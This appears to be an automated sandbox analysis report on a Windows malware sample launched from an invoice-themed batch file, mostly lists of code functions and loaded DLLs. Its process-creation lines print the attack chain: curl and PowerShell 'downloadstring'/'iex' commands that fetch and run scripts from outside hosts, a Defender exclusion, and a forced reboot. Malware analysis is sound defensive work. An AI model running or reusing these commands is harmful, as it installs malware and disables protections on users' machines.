            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD89C8E9_2_6FD89C8E
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD83B1D9_2_6FD83B1D
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FE17B2A9_2_6FE17B2A
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FE11AE09_2_6FE11AE0
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCDA389_2_6FDCDA38
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FE039689_2_6FE03968
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDEF8BA9_2_6FDEF8BA
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDE98779_2_6FDE9877
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD857959_2_6FD85795
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FE0D7549_2_6FE0D754
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDEB7239_2_6FDEB723
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD896C99_2_6FD896C9
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FE196A79_2_6FE196A7
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD875C19_2_6FD875C1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD835FA9_2_6FD835FA
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCD4FF9_2_6FDCD4FF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDED43B9_2_6FDED43B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FE192959_2_6FE19295
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD872109_2_6FD87210
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDE31BA9_2_6FDE31BA
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDE516D9_2_6FDE516D
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD9911E9_2_6FD9911E
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDE6E1811_2_6FDE6E18
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD86E2811_2_6FD86E28
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD86E2411_2_6FD86E24
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDBEB1A11_2_6FDBEB1A
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDA091911_2_6FDA0919
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FE0091511_2_6FE00915
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FE167FF11_2_6FE167FF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDEE7F111_2_6FDEE7F1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD945AE11_2_6FD945AE
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD8846811_2_6FD88468
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD8839B11_2_6FD8839B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDE22CD11_2_6FDE22CD
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD8828B11_2_6FD8828B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCA27711_2_6FDCA277
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FE0822011_2_6FE08220
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD8A1DD11_2_6FD8A1DD
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD721F011_2_6FD721F0
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDE415911_2_6FDE4159
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCDF3511_2_6FDCDF35
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD85E2011_2_6FD85E20
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD83DB111_2_6FD83DB1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD87D2011_2_6FD87D20
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FE01CEF11_2_6FE01CEF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD89C8E11_2_6FD89C8E
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD83B1D11_2_6FD83B1D
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FE17B2A11_2_6FE17B2A
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FE11AE011_2_6FE11AE0
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCDA3811_2_6FDCDA38
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FE0396811_2_6FE03968
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDEF8BA11_2_6FDEF8BA
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDE987711_2_6FDE9877
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD8579511_2_6FD85795
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FE0D75411_2_6FE0D754
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDEB72311_2_6FDEB723
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD896C911_2_6FD896C9
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FE196A711_2_6FE196A7
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD875C111_2_6FD875C1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD835FA11_2_6FD835FA
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCD4FF11_2_6FDCD4FF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDED43B11_2_6FDED43B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FE1929511_2_6FE19295
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD8721011_2_6FD87210
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDE31BA11_2_6FDE31BA
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDE516D11_2_6FDE516D
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD9911E11_2_6FD9911E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0419A55013_2_0419A550
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0419E48813_2_0419E488
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0419A54113_2_0419A541
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: String function: 6FD80950 appears 302 times
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: String function: 6FD8B69A appears 122 times
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: String function: 6FD83A30 appears 34 times
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: String function: 6FD8A42E appears 50 times
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: String function: 6FD8D778 appears 46 times
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: String function: 6FD8072B appears 54 times
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: String function: 6FD8A455 appears 78 times
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: String function: 6FD80934 appears 148 times
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1184
            Source: jli.dll.4.drStatic PE information: Number of sections : 11 > 10
            Source: amsi64_6872.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi64_7380.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6872, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.rans.expl.evad.winBAT@26/50@1/3
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCD3BB _getdiskfree,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,memset,GetDiskFreeSpaceA,GetLastError,_errno,9_2_6FDCD3BB
            Source: C:\Windows\System32\curl.exeFile created: C:\Users\Public\Documents\vs1.ps1Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1492
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blqdhdij.dyb.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" "
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\curl.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -win 1 -
            Source: unknownProcess created: C:\_kjfech8_V\_kjfech8_Vi7.exe "C:\_kjfech8_V\_kjfech8_Vi7.exe"
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\_kjfech8_V\_kjfech8_Vi7.exe "C:\_kjfech8_V\_kjfech8_Vi7.exe"
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1184
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\shutdown.exe "C:\Windows\system32\shutdown.exe" /r /t 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\_kjfech8_V\_kjfech8_Vi7.exe "C:\_kjfech8_V\_kjfech8_Vi7.exe" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\shutdown.exe "C:\Windows\system32\shutdown.exe" /r /t 10Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -win 1 -Jump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"Jump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
